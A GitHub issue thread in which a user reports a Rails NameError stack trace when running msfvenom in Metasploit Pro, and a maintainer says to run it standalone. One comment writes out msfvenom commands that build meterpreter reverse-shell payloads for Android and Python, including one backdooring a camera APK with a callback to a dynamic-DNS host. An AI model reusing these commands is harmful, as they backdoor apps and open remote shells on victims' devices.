### ISSUE TITLE
I ran metasploit pro version 4.16.49-dev And I get this message  ::: /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/wicked-0.5.0/app/controllers/wicked/wizard_controller.rb:5:in `<top (required)>': uninitialized constant ApplicationController (NameError)

### ISSUE THREAD

**Issue by yf007** [rapid7/metasploit-framework#9910]
## Steps to reproduce

How'd you do it?

Hey
The problem was still the same
Same error message as above

https://github.com/rapid7/metasploit-framework/issues/9035

### I installed Metasploit with:

- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)

### OS

What OS are you running Metasploit on?  

kali 64

**Comment by yf007** [comment]
I tried to run some commands on the msfvenom 

msfvenom -p android/meterpreter/reverse_tcp LHOST=***.zapto.org LPORT=4444 R > 1234.apk

msfvenom -x CameraSample.apk -p android/meterpreter/reverse_tcp
LHOST=192.168.1.76 LPORT=4444 -o CameraSample_backdoored.apk

msfvenom -f raw -o test.py -p python/meterpreter/reverse_tcp LHOST=192.168.56.1

Nothing works...

**Comment by yf007** [comment]
/opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/wicked-0.5.0/app/controllers/wicked/wizard_controller.rb:5:in `<top (required)>': uninitialized constant ApplicationController (NameError)
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/engine.rb:472:in `block (2 levels) in eager_load!'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/engine.rb:471:in `each'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/engine.rb:471:in `block in eager_load!'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/engine.rb:469:in `each'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/engine.rb:469:in `eager_load!'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/engine.rb:346:in `eager_load!'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/application/finisher.rb:56:in `each'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/application/finisher.rb:56:in `block in <module:Finisher>'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/initializable.rb:30:in `instance_exec'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/initializable.rb:30:in `run'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/initializable.rb:55:in `block in run_initializers'
	from /opt/metasploit007/ruby/lib/ruby/2.3.0/tsort.rb:228:in `block in tsort_each'
	from /opt/metasploit007/ruby/lib/ruby/2.3.0/tsort.rb:350:in `block (2 levels) in each_strongly_connected_component'
	from /opt/metasploit007/ruby/lib/ruby/2.3.0/tsort.rb:431:in `each_strongly_connected_component_from'
	from /opt/metasploit007/ruby/lib/ruby/2.3.0/tsort.rb:349:in `block in each_strongly_connected_component'
	from /opt/metasploit007/ruby/lib/ruby/2.3.0/tsort.rb:347:in `each'
	from /opt/metasploit007/ruby/lib/ruby/2.3.0/tsort.rb:347:in `call'
	from /opt/metasploit007/ruby/lib/ruby/2.3.0/tsort.rb:347:in `each_strongly_connected_component'
	from /opt/metasploit007/ruby/lib/ruby/2.3.0/tsort.rb:226:in `tsort_each'
	from /opt/metasploit007/ruby/lib/ruby/2.3.0/tsort.rb:205:in `tsort_each'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/initializable.rb:54:in `run_initializers'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/application.rb:352:in `initialize!'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/railtie.rb:194:in `public_send'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/railties-4.2.10/lib/rails/railtie.rb:194:in `method_missing'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.49/config/environment.rb:5:in `<top (required)>'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.49/lib/msfenv.rb:18:in `require'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.49/lib/msfenv.rb:18:in `<top (required)>'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.49/msfvenom:18:in `require'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.49/msfvenom:18:in `require_deps'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.49/msfvenom:36:in `init_framework'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.49/msfvenom:55:in `framework'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.16.49/msfvenom:339:in `<top (required)>'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom:23:in `load'
	from /opt/metasploit007/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom:23:in `<main>'

**Comment by busterb** [comment]
Run msfvenom _outside_ of msfconsole. It is intended to run as a standalone program, not as a subcommand of msfconsole..
